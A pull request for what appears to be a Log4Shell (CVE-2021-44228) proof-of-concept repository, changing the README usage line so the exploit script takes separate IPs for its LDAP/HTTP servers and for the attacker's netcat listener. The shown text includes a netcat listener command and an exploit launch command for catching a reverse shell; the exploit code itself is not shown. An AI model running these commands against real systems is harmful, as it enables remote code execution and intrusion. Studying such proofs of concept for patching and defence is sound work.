### PR TITLE
Getting netcat and servers to run on different machines

### DIFF
--- a/README.md
+++ b/README.md
@@ -45,7 +45,7 @@ nc -lvnp 9001
 * Launch the exploit.<br>
 **Note:** For this to work, the extracted java archive has to be named: `jdk1.8.0_20`, and be in the same directory.
 ```py
-$ python3 poc.py --userip localhost --webport 8000 --lport 9001
+$ python3 poc.py --serversip localhost --webport 8000 --ncip localhost --ncport 9001
 
 [!] CVE: CVE-2021-44228
 [!] Github repo: https://github.com/kozmer/log4j-shell-poc


### PR DESCRIPTION
I've separated *userip* into *serversip* and *ncip*, being:
- *serversip* the IP address for both servers ("LDAP" and HTTP)
- * ncip * the IP of the attacker's machine, that is, who is running `netcat`

I've also renamed *lport* as *ncport*, because I find it easier to understand for a new use, and that name is similar to *ncip* (the other `netcat` related argument)
